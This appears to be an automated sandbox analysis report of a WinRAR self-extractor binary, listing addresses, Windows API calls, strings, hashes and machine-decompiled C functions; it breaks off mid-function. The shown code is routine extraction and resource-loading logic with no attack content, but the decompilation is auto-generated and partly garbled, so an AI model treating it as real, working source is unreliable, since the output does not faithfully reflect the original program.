0x0027cc18
0x0027cc85
0x0027cc1a
0x0027cc2d
0x0027cc31
0x0027cc72
0x0027cc78
0x0027cc78
0x0027cc7b
0x0027cc81
0x0027cc18
0x0027cc96
0x0027cca8
0x0027ccaf
0x0027ccba
0x0027ccc0
0x0027ccc6
0x0027cccc
0x0027ccd2
0x0027ccd8
0x0027ccee
0x0027ccf3
0x0027cd00
0x0027cd09
0x0027cd0e
0x0027cd14
0x0027cd1a
0x0027cd20
0x0027cd30
0x0027cd35
0x0027cd3e
0x0027cd47
0x0027cd57
0x0027cd66
0x0027cd6b
0x0027cd75
0x0027cd7b
0x0027cd81
0x0027cd8a
0x0027cd8f
0x0027cd96
0x0027cd99
0x0027cd99
0x0027cda6
0x0027cda8
0x0027cda8
0x0027cdb2
0x0027cdbe
0x0027cdc6
0x0027cdcb
0x0027cdd8
0x0027cdda
0x0027cde1
0x0027cde4
0x0027cde4
0x0027cded
0x0027ce02
0x0027ce02
0x0027ce07
0x0027ce0c
0x0027ce15
0x0027ce18
0x0027ce23
0x0027ce23
0x0027ce30
0x0027ce36
0x0027ce3f
0x0027ce44
0x0027ce54
0x0027ce56
0x0027ce58
0x0027ce58
0x0027ce58
0x0027ce46
0x0027ce46
0x0027ce4e
0x0027ce50
0x0027ce50
0x0027ce4e
0x0027ce44
0x0027ce5e
0x0027ce6e

APIs

Part of subcall function 0026FD49: GetModuleHandleW.KERNEL32 ref: 0026FD61
Part of subcall function 0026FD49: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0026FD79
Part of subcall function 0026FD49: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0026FD9C

Part of subcall function 002795F8: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00279600

Part of subcall function 00279AA0: OleInitialize.OLE32(00000000), ref: 00279AB9
Part of subcall function 00279AA0: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00279AF0
Part of subcall function 00279AA0: SHGetMalloc.SHELL32(002A75C0), ref: 00279AFA

Part of subcall function 00271017: GetCPInfo.KERNEL32(00000000,?), ref: 00271028
Part of subcall function 00271017: IsDBCSLeadByte.KERNEL32(00000000), ref: 0027103C

GetCommandLineW.KERNEL32 ref: 0027CC00
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0027CC27
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0027CC38
UnmapViewOfFile.KERNEL32(00000000), ref: 0027CC72

Part of subcall function 0027C891: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0027C8A7
Part of subcall function 0027C891: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0027C8E3

CloseHandle.KERNEL32(00000000), ref: 0027CC7B
GetModuleFileNameW.KERNEL32(00000000,002BCE18,00000800), ref: 0027CC96
SetEnvironmentVariableW.KERNELBASE(sfxname,002BCE18), ref: 0027CCA8
GetLocalTime.KERNEL32(?), ref: 0027CCAF
_swprintf.LIBCMT ref: 0027CCEE
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0027CD00
GetModuleHandleW.KERNEL32(00000000), ref: 0027CD03
LoadIconW.USER32(00000000,00000064), ref: 0027CD1A
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001A5D1,00000000), ref: 0027CD6B
Sleep.KERNEL32(?), ref: 0027CD99
DeleteObject.GDI32 ref: 0027CDD8
DeleteObject.GDI32(?), ref: 0027CDE4
CloseHandle.KERNEL32 ref: 0027CE23

Strings

C:\Windows\system32, xrefs: 0027CBCD
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 0027CCDF
STARTDLG, xrefs: 0027CD60
winrarsfxmappingfile.tmp, xrefs: 0027CC1B
ps*, xrefs: 0027CBE0
sfxstime, xrefs: 0027CCFB
sfxname, xrefs: 0027CCA3

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Windows\system32$STARTDLG$ps*$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 788466649-1618417670
Opcode ID: afd814f475ee1b9c823781412e052c1d3091d6c8d6f77a52dfe505cc0f8a6ec6
Instruction ID: 8a8d3ed18be585f9dd50baec2dac6adc37891504a7feda1a7b311373e3fd7d48
Opcode Fuzzy Hash: afd814f475ee1b9c823781412e052c1d3091d6c8d6f77a52dfe505cc0f8a6ec6
Instruction Fuzzy Hash: 0761C471924311ABD711AF74FC8DF6B3BACEB4A700F14442AF94996191DBB48C64CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0027963A, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 92
memorywindowCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0027963A(WCHAR* _a4) {
				WCHAR* _v4;
				intOrPtr _v8;
				intOrPtr* _v16;
				char _v20;
				void* __ecx;
				struct HRSRC__* _t14;
				WCHAR* _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				intOrPtr* _t26;
				char* _t30;
				long _t32;
				void* _t34;
				intOrPtr* _t35;
				void* _t40;
				struct HRSRC__* _t42;
				intOrPtr* _t44;

				_t14 = FindResourceW( *0x2a0060, _a4, "PNG");
				_t42 = _t14;
				if(_t42 == 0) {
					return _t14;
				}
				_t32 = SizeofResource( *0x2a0060, _t42);
				if(_t32 == 0) {
					L4:
					_t16 = 0;
					L16:
					return _t16;
				}
				_t17 = LoadResource( *0x2a0060, _t42);
				if(_t17 == 0) {
					goto L4;
				}
				_t18 = LockResource(_t17);
				_t43 = _t18;
				if(_t18 != 0) {
					_v4 = 0;
					_t19 = GlobalAlloc(2, _t32); // executed
					_t40 = _t19;
					if(_t40 == 0) {
						L15:
						_t16 = _v4;
						goto L16;
					}
					if(GlobalLock(_t40) == 0) {
						L14:
						GlobalFree(_t40);
						goto L15;
					}
					E0027EA80(_t20, _t43, _t32);
					_a4 = 0;
					_push( &_a4);
					_push(0);
					_push(_t40);
					if( *0x29dff8() == 0) {
						_t26 = E002795CF(_t24, _t34, _v8, 0); // executed
						_t35 = _v16;
						_t44 = _t26;
						 *((intOrPtr*)( *_t35 + 8))(_t35);
						if(_t44 != 0) {
							 *((intOrPtr*)(_t44 + 8)) = 0;
							if( *((intOrPtr*)(_t44 + 8)) == 0) {
								_push(0xffffff);
								_t30 =  &_v20;
								_push(_t30);
								_push( *((intOrPtr*)(_t44 + 4)));
								L0027D81A(); // executed
								if(_t30 != 0) {
									 *((intOrPtr*)(_t44 + 8)) = _t30;
								}
							}
							 *((intOrPtr*)( *_t44))(1);
						}
					}
					GlobalUnlock(_t40);
					goto L14;
				}
				goto L4;
			}

0x0027964b
0x00279651
0x00279655
0x00279732
0x00279732
0x00279669
0x0027966d
0x0027968d
0x0027968d
0x0027972f
0x00000000
0x0027972f
0x00279676
0x0027967e
0x00000000
0x00000000
0x00279681
0x00279687
0x0027968b
0x0027969b
0x0027969f
0x002796a5
0x002796a9
0x00279729
0x00279729
0x00000000
0x0027972e
0x002796b4
0x00279722
0x00279723
0x00000000
0x00279723
0x002796b9
0x002796c1
0x002796c9
0x002796ca
0x002796cb
0x002796d4
0x002796db
0x002796e0
0x002796e4
0x002796e9
0x002796ee
0x002796f3
0x002796f8
0x002796fa
0x002796ff
0x00279703
0x00279704
0x00279707
0x0027970e
0x00279710
0x00279710
0x0027970e
0x00279719
0x00279719
0x002796ee
0x0027971c
0x00000000
0x0027971c
0x00000000

APIs

FindResourceW.KERNEL32(00000066,PNG,?,?,0027A54A,00000066), ref: 0027964B
SizeofResource.KERNEL32(00000000,76DB5689,?,?,0027A54A,00000066), ref: 00279663
LoadResource.KERNEL32(00000000,?,?,0027A54A,00000066), ref: 00279676
LockResource.KERNEL32(00000000,?,?,0027A54A,00000066), ref: 00279681
GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,0027A54A,00000066), ref: 0027969F
GlobalLock.KERNEL32 ref: 002796AC
CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 002796CC
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00279707
GlobalUnlock.KERNEL32(00000000), ref: 0027971C
GlobalFree.KERNEL32(00000000), ref: 00279723

Strings

PNG, xrefs: 0027963C

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
String ID: PNG
API String ID: 3656887471-364855578
Opcode ID: b3a7aaf764592b9b5a4ec770a40177d08d970efc251b35bc0222d0cb69ce944f
Instruction ID: c803201c7af2503e6099b443843c40a950ad36bb052bae2327760f695df56193
Opcode Fuzzy Hash: b3a7aaf764592b9b5a4ec770a40177d08d970efc251b35bc0222d0cb69ce944f
Instruction Fuzzy Hash: 0D219171620312ABC7259F61EC8CE2BBBADEF85790B01852DF949C2161DB31CC64CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0026A2DF, Relevance: 7.6, APIs: 5, Instructions: 108
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0026A2DF(void* __edx, intOrPtr _a4, intOrPtr _a8, char _a32, short _a592, void* _a4692, WCHAR* _a4696, intOrPtr _a4700) {
				struct _WIN32_FIND_DATAW _v0;
				char _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _t43;
				signed int _t49;
				signed int _t63;
				void* _t65;
				long _t68;
				char _t69;
				void* _t73;
				void* _t82;
				intOrPtr _t84;
				void* _t87;
				signed int _t89;
				void* _t90;

				_t82 = __edx;
				E0027D940();
				_push(_t89);
				_t87 = _a4692;
				_t84 = _a4700;
				_t90 = _t89 | 0xffffffff;
				_push( &_v0);
				if(_t87 != _t90) {
					_t43 = FindNextFileW(_t87, ??);
					__eflags = _t43;
					if(_t43 == 0) {
						_t87 = _t90;
						_t63 = GetLastError();
						__eflags = _t63 - 0x12;
						_t11 = _t63 != 0x12;
						__eflags = _t11;
						 *((char*)(_t84 + 0x1044)) = _t63 & 0xffffff00 | _t11;
					}
					__eflags = _t87 - _t90;
					if(_t87 != _t90) {
						goto L13;
					}
				} else {
					_t65 = FindFirstFileW(_a4696, ??); // executed
					_t87 = _t65;
					if(_t87 != _t90) {
						L13:
						E0026FAB1(_t84, _a4696, 0x800);
						_push(0x800);
						E0026B9B9(__eflags, _t84,  &_a32);
						_t49 = 0 + _a8;
						__eflags = _t49;
						 *(_t84 + 0x1000) = _t49;
						asm("adc ecx, 0x0");
						 *((intOrPtr*)(_t84 + 0x1008)) = _v24;
						 *((intOrPtr*)(_t84 + 0x1028)) = _v20;
						 *((intOrPtr*)(_t84 + 0x102c)) = _v16;
						 *((intOrPtr*)(_t84 + 0x1030)) = _v12;
						 *((intOrPtr*)(_t84 + 0x1034)) = _v8;
						 *((intOrPtr*)(_t84 + 0x1038)) = _v4;
						 *(_t84 + 0x103c) = _v0.dwFileAttributes;
						 *((intOrPtr*)(_t84 + 0x1004)) = _a4;
						E00270A81(_t84 + 0x1010, _t82,  &_v4);
						E00270A81(_t84 + 0x1018, _t82,  &_v24);
						E00270A81(_t84 + 0x1020, _t82,  &_v20);
					} else {
						if(E0026B32C(_a4696,  &_a592, 0x800) == 0) {
							L4:
							_t68 = GetLastError();
							if(_t68 == 2 || _t68 == 3 || _t68 == 0x12) {
								_t69 = 0;
								__eflags = 0;
							} else {
								_t69 = 1;
							}
							 *((char*)(_t84 + 0x1044)) = _t69;
						} else {
							_t73 = FindFirstFileW( &_a592,  &_v0); // executed
							_t87 = _t73;
							if(_t87 != _t90) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t84 + 0x1040) =  *(_t84 + 0x1040) & 0x00000000;
				return _t87;
			}

0x0026a2df
0x0026a2e4
0x0026a2ea
0x0026a2ec
0x0026a2f8
0x0026a2ff
0x0026a302
0x0026a305
0x0026a37a
0x0026a380
0x0026a382
0x0026a384
0x0026a386
0x0026a38c
0x0026a38f
0x0026a38f
0x0026a392
0x0026a392
0x0026a398
0x0026a39a
0x00000000
0x00000000
0x0026a307
0x0026a314
0x0026a316
0x0026a31a
0x0026a3a0
0x0026a3ae
0x0026a3b3
0x0026a3ba
0x0026a3c5
0x0026a3c5
0x0026a3c9
0x0026a3d3
0x0026a3d6
0x0026a3e0
0x0026a3ea
0x0026a3f4
0x0026a3fe
0x0026a408
0x0026a412
0x0026a41c
0x0026a429
0x0026a439
0x0026a449
0x0026a320
0x0026a33b
0x0026a352
0x0026a352
0x0026a35b
0x0026a36c
0x0026a36c
0x0026a367
0x0026a369
0x0026a369
0x0026a36e
0x0026a33d
0x0026a34a
0x0026a34c
0x0026a350
0x00000000
0x00000000
0x00000000
0x00000000
0x0026a350
0x0026a33b
0x0026a31a
0x0026a44e
0x0026a461

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0026A1DA,000000FF,?,?), ref: 0026A314
FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0026A1DA,000000FF,?,?), ref: 0026A34A
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0026A1DA,000000FF,?,?), ref: 0026A352
FindNextFileW.KERNEL32(?,?,?,?,?,?,0026A1DA,000000FF,?,?), ref: 0026A37A
GetLastError.KERNEL32(?,?,?,?,0026A1DA,000000FF,?,?), ref: 0026A386

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: 9bf7e3ce8821beb78b39368234aa06a3d58aa3ceff0b306e1da17a10777c09da
Instruction ID: 2927a542a33724a3dcde94046cf5298e998ceb7d2a59ea041bedae210e60d0f2
Opcode Fuzzy Hash: 9bf7e3ce8821beb78b39368234aa06a3d58aa3ceff0b306e1da17a10777c09da
Instruction Fuzzy Hash: BD416272614342AFC325DF68C8C5ADAF7E8FB49350F104A1AF599D3240D774A9B88F92

Uniqueness

Uniqueness Score: -1.00%

Function 00286AF3, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00286AF3(int _a4) {
				void* _t7;
				void* _t14;
				void* _t16;

				_t7 = E00289D6E(_t14, _t16); // executed
				if(_t7 != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00286B78(_t14, _t16, _a4);
				ExitProcess(_a4);
			}

0x00286af8
0x00286aff
0x00286b1b
0x00286b1b
0x00286b24
0x00286b2d

APIs

GetCurrentProcess.KERNEL32(?,?,00286AC9,?,0029A800,0000000C,00286C20,?,00000002,00000000), ref: 00286B14
TerminateProcess.KERNEL32(00000000,?,00286AC9,?,0029A800,0000000C,00286C20,?,00000002,00000000), ref: 00286B1B
ExitProcess.KERNEL32 ref: 00286B2D

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: dd73e0d7cb03e6eab71134425be018e6591c4c1fa1abb05f447b99ed52ac2064
Instruction ID: 716326a69bcce75beae3d019650014886bc681c8092817425e392c78856ecf22
Opcode Fuzzy Hash: dd73e0d7cb03e6eab71134425be018e6591c4c1fa1abb05f447b99ed52ac2064
Instruction Fuzzy Hash: 66E0B639011108EBCF117F64ED0DA583F69EB54749B004415FA09AA272CB35DD66DB90

Uniqueness

Uniqueness Score: -1.00%

Function 002683C0, Relevance: 3.9, APIs: 2, Instructions: 940
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E002683C0(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t370;
				signed int _t374;
				signed int _t375;
				signed int _t380;
				signed int _t385;
				void* _t387;
				signed int _t388;
				signed int _t392;
				signed int _t393;
				signed int _t398;
				signed int _t403;
				signed int _t404;
				signed int _t408;
				signed int _t418;
				signed int _t419;
				signed int _t422;
				signed int _t423;
				signed int _t432;
				char _t434;
				char _t436;
				signed int _t437;
				signed int _t438;
				signed int _t460;
				signed int _t469;
				intOrPtr _t472;
				char _t479;
				signed int _t480;
				void* _t491;
				void* _t499;
				void* _t501;
				signed int _t511;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t520;
				signed int _t523;
				signed int _t531;
				signed int _t541;
				signed int _t543;
				signed int _t545;
				signed int _t547;
				signed char _t548;
				signed int _t551;
				void* _t556;
				signed int _t564;
				intOrPtr* _t574;
				intOrPtr _t576;
				signed int _t577;
				signed int _t586;
				intOrPtr _t589;
				signed int _t592;
				signed int _t601;
				signed int _t608;
				signed int _t610;
				signed int _t611;
				signed int _t613;
				signed int _t631;
				signed int _t632;
				void* _t639;
				void* _t640;
				signed int _t656;
				signed int _t667;
				intOrPtr _t668;
				void* _t670;
				signed int _t671;
				signed int _t672;
				signed int _t673;
				signed int _t674;
				signed int _t675;
				signed int _t681;
				intOrPtr _t683;
				signed int _t688;
				intOrPtr _t690;
				signed int _t692;
				signed int _t696;
				void* _t698;
				signed int _t699;
				signed int _t702;
				signed int _t703;
				void* _t706;
				void* _t708;
				void* _t710;

				_t576 = __ecx;
				E0027D870(E002912F2, _t706);
				E0027D940();
				_t574 =  *((intOrPtr*)(_t706 + 8));
				_t665 = 0;
				_t683 = _t576;
				 *((intOrPtr*)(_t706 - 0x20)) = _t683;
				_t370 =  *( *(_t683 + 8) + 0x82f2) & 0x0000ffff;
				 *(_t706 - 0x18) = _t370;
				if( *(_t706 + 0xc) != 0) {
					L6:
					_t690 =  *((intOrPtr*)(_t574 + 0x21dc));
					__eflags = _t690 - 2;
					if(_t690 == 2) {
						 *(_t683 + 0x10f5) = _t665;
						__eflags =  *(_t574 + 0x32dc) - _t665;
						if(__eflags > 0) {
							L22:
							__eflags =  *(_t574 + 0x32e4) - _t665;
							if(__eflags > 0) {
								L26:
								_t577 =  *(_t683 + 8);
								__eflags =  *((intOrPtr*)(_t577 + 0x615c)) - _t665;
								if( *((intOrPtr*)(_t577 + 0x615c)) != _t665) {
									L29:
									 *(_t706 - 0x11) = _t665;
									_t35 = _t706 - 0x51a8; // -18856
									_t36 = _t706 - 0x11; // 0x7ef
									_t374 = E00265C80(_t577, _t574 + 0x2280, _t36, 6, _t665, _t35, 0x800);
									__eflags = _t374;
									_t375 = _t374 & 0xffffff00 | _t374 != 0x00000000;
									 *(_t706 - 0x10) = _t375;
									__eflags = _t375;
									if(_t375 != 0) {
										__eflags =  *(_t706 - 0x11);
										if( *(_t706 - 0x11) == 0) {
											__eflags = 0;
											 *((char*)(_t683 + 0xf1)) = 0;
										}
									}
									E00261F1B(_t574);
									_push(0x800);
									_t43 = _t706 - 0x113c; // -2364
									_push(_t574 + 0x22a8);
									E0026AFA3();
									__eflags =  *((char*)(_t574 + 0x3373));
									 *(_t706 - 0x1c) = 1;
									if( *((char*)(_t574 + 0x3373)) == 0) {
										_t380 = E00262005(_t574);
										__eflags = _t380;
										if(_t380 == 0) {
											_t548 =  *(_t683 + 8);
											__eflags = 1 -  *((intOrPtr*)(_t548 + 0x72bc));
											asm("sbb al, al");
											_t61 = _t706 - 0x10;
											 *_t61 =  *(_t706 - 0x10) &  !_t548;
											__eflags =  *_t61;
										}
									} else {
										_t551 =  *( *(_t683 + 8) + 0x72bc);
										__eflags = _t551 - 1;
										if(_t551 != 1) {
											__eflags =  *(_t706 - 0x11);
											if( *(_t706 - 0x11) == 0) {
												__eflags = _t551;
												 *(_t706 - 0x10) =  *(_t706 - 0x10) & (_t551 & 0xffffff00 | _t551 == 0x00000000) - 0x00000001;
												_push(0);
												_t54 = _t706 - 0x113c; // -2364
												_t556 = E0026B8F2(_t54);
												_t656 =  *(_t683 + 8);
												__eflags =  *((intOrPtr*)(_t656 + 0x72bc)) - 1 - _t556;
												if( *((intOrPtr*)(_t656 + 0x72bc)) - 1 != _t556) {
													 *(_t706 - 0x10) = 0;
												} else {
													_t57 = _t706 - 0x113c; // -2364
													_push(1);
													E0026B8F2(_t57);
												}
											}
										}
									}
									 *((char*)(_t683 + 0x5f)) =  *((intOrPtr*)(_t574 + 0x3319));
									 *((char*)(_t683 + 0x60)) = 0;
									asm("sbb eax, [ebx+0x32dc]");
									 *((intOrPtr*)( *_t574 + 0x10))( *((intOrPtr*)(_t574 + 0x6ca8)) -  *(_t574 + 0x32d8),  *((intOrPtr*)(_t574 + 0x6cac)), 0);
									_t667 = 0;
									_t385 = 0;
									 *(_t706 + 0xb) = 0;
									 *(_t706 + 0xc) = 0;
									__eflags =  *(_t706 - 0x10);
									if( *(_t706 - 0x10) != 0) {
										L43:
										_t692 =  *(_t706 - 0x18);
										_t586 =  *((intOrPtr*)( *(_t683 + 8) + 0x61f9));
										_t387 = 0x49;
										__eflags = _t586;
										if(_t586 == 0) {
											L45:
											_t388 = _t667;
											L46:
											__eflags = _t586;
											_t82 = _t706 - 0x113c; // -2364
											_t392 = E00270FD9(_t586, _t82, (_t388 & 0xffffff00 | _t586 == 0x00000000) & 0x000000ff, _t388,  *(_t706 + 0xc)); // executed
											__eflags = _t392;
											if(__eflags == 0) {
												L219:
												_t393 = 0;
												L16:
												L17:
												 *[fs:0x0] =  *((intOrPtr*)(_t706 - 0xc));
												return _t393;
											}
											 *((intOrPtr*)(_t706 - 0x38)) = _t683 + 0x10f6;
											_t85 = _t706 - 0x113c; // -2364
											E002680B1(_t683, __eflags, _t574, _t85, _t683 + 0x10f6, 0x800);
											__eflags =  *(_t706 + 0xb);
											if( *(_t706 + 0xb) != 0) {
												L50:
												 *(_t706 + 0xf) = 0;
												L51:
												_t398 =  *(_t683 + 8);
												_t589 = 0x45;
												__eflags =  *((char*)(_t398 + 0x6153));
												_t668 = 0x58;
												 *((intOrPtr*)(_t706 - 0x34)) = _t589;
												 *((intOrPtr*)(_t706 - 0x30)) = _t668;
												if( *((char*)(_t398 + 0x6153)) != 0) {
													L53:
													__eflags = _t692 - _t589;
													if(_t692 == _t589) {
														L55:
														_t96 = _t706 - 0x31a8; // -10664
														E00266EF9(_t96);
														_push(0);
														_t97 = _t706 - 0x31a8; // -10664
														_t403 = E0026A1B1(_t96, _t668, __eflags, _t683 + 0x10f6, _t97);
														__eflags = _t403;
														if(_t403 == 0) {
															_t404 =  *(_t683 + 8);
															__eflags =  *((char*)(_t404 + 0x6153));
															_t108 = _t706 + 0xf;
															 *_t108 =  *(_t706 + 0xf) & (_t404 & 0xffffff00 |  *((char*)(_t404 + 0x6153)) != 0x00000000) - 0x00000001;
															__eflags =  *_t108;
															L61:
															_t110 = _t706 - 0x113c; // -2364
															_t408 = E00267BE2(_t110, _t574, _t110);
															__eflags = _t408;
															if(_t408 != 0) {
																while(1) {
																	__eflags =  *((char*)(_t574 + 0x331b));
																	if( *((char*)(_t574 + 0x331b)) == 0) {
																		goto L65;
																	}
																	_t115 = _t706 - 0x113c; // -2364
																	_t541 = E0026807D(_t683, _t574);
																	__eflags = _t541;
																	if(_t541 == 0) {
																		 *((char*)(_t683 + 0x20f6)) = 1;
																		goto L219;
																	}
																	L65:
																	_t117 = _t706 - 0x13c; // 0x6c4
																	_t592 = 0x40;
																	memcpy(_t117,  *(_t683 + 8) + 0x5024, _t592 << 2);
																	_t710 = _t708 + 0xc;
																	asm("movsw");
																	_t120 = _t706 - 0x2c; // 0x7d4
																	_t683 =  *((intOrPtr*)(_t706 - 0x20));
																	 *(_t706 - 4) = 0;
																	asm("sbb ecx, ecx");
																	_t127 = _t706 - 0x13c; // 0x6c4
																	E0026C634(_t683 + 0x10, 0,  *((intOrPtr*)(_t574 + 0x331c)), _t127,  ~( *(_t574 + 0x3320) & 0x000000ff) & _t574 + 0x00003321, _t574 + 0x3331,  *((intOrPtr*)(_t574 + 0x336c)), _t574 + 0x334b, _t120);
																	__eflags =  *((char*)(_t574 + 0x331b));
																	if( *((char*)(_t574 + 0x331b)) == 0) {
																		L73:
																		 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																		_t146 = _t706 - 0x13c; // 0x6c4
																		L0026E724(_t146);
																		_t147 = _t706 - 0x2160; // -6496
																		E0026943C(_t147);
																		_t418 =  *(_t574 + 0x3380);
																		 *(_t706 - 4) = 1;
																		 *(_t706 - 0x24) = _t418;
																		_t670 = 0x50;
																		__eflags = _t418;
																		if(_t418 == 0) {
																			L83:
																			_t419 = E00262005(_t574);
																			__eflags = _t419;
																			if(_t419 == 0) {
																				_t601 =  *(_t706 + 0xf);
																				__eflags = _t601;
																				if(_t601 == 0) {
																					_t696 =  *(_t706 - 0x18);
																					L96:
																					__eflags =  *((char*)(_t574 + 0x6cb4));
																					if( *((char*)(_t574 + 0x6cb4)) == 0) {
																						__eflags = _t601;
																						if(_t601 == 0) {
																							L212:
																							 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																							_t358 = _t706 - 0x2160; // -6496
																							E0026946E(_t358);
																							__eflags =  *(_t706 - 0x10);
																							_t385 =  *(_t706 + 0xf);
																							_t671 =  *(_t706 + 0xb);
																							if( *(_t706 - 0x10) != 0) {
																								_t362 = _t683 + 0xec;
																								 *_t362 =  *(_t683 + 0xec) + 1;
																								__eflags =  *_t362;
																							}
																							L214:
																							__eflags =  *((char*)(_t683 + 0x60));
																							if( *((char*)(_t683 + 0x60)) != 0) {
																								goto L219;
																							}
																							__eflags = _t385;
																							if(_t385 != 0) {
																								L15:
																								_t393 = 1;
																								goto L16;
																							}
																							__eflags =  *((intOrPtr*)(_t574 + 0x6cb4)) - _t385;
																							if( *((intOrPtr*)(_t574 + 0x6cb4)) != _t385) {
																								__eflags = _t671;
																								if(_t671 != 0) {
																									goto L15;
																								}
																								goto L219;
																							}
																							L217:
																							E00261E3B(_t574);
																							goto L15;
																						}
																						L101:
																						_t422 =  *(_t683 + 8);
																						__eflags =  *((char*)(_t422 + 0x61f9));
																						if( *((char*)(_t422 + 0x61f9)) == 0) {
																							L103:
																							_t423 =  *(_t706 + 0xb);
																							__eflags = _t423;
																							if(_t423 != 0) {
																								L108:
																								 *((char*)(_t706 - 0xf)) = 1;
																								__eflags = _t423;
																								if(_t423 != 0) {
																									L110:
																									 *((intOrPtr*)(_t683 + 0xe8)) =  *((intOrPtr*)(_t683 + 0xe8)) + 1;
																									 *((intOrPtr*)(_t683 + 0x80)) = 0;
																									 *((intOrPtr*)(_t683 + 0x84)) = 0;
																									 *((intOrPtr*)(_t683 + 0x88)) = 0;
																									 *((intOrPtr*)(_t683 + 0x8c)) = 0;
																									E0026A728(_t683 + 0xc8, _t670,  *((intOrPtr*)(_t574 + 0x32f0)),  *((intOrPtr*)( *(_t683 + 8) + 0x82d8)));
																									E0026A728(_t683 + 0xa0, _t670,  *((intOrPtr*)(_t574 + 0x32f0)),  *((intOrPtr*)( *(_t683 + 8) + 0x82d8)));
																									_t698 = _t683 + 0x10;
																									 *(_t683 + 0x30) =  *(_t574 + 0x32d8);
																									_t217 = _t706 - 0x2160; // -6496
																									 *(_t683 + 0x34) =  *(_t574 + 0x32dc);
																									E0026C67C(_t698, _t574, _t217);
																									_t672 =  *((intOrPtr*)(_t706 - 0xf));
																									_t608 = 0;
																									_t432 =  *(_t706 + 0xb);
																									 *((char*)(_t683 + 0x39)) = _t672;
																									 *((char*)(_t683 + 0x3a)) = _t432;
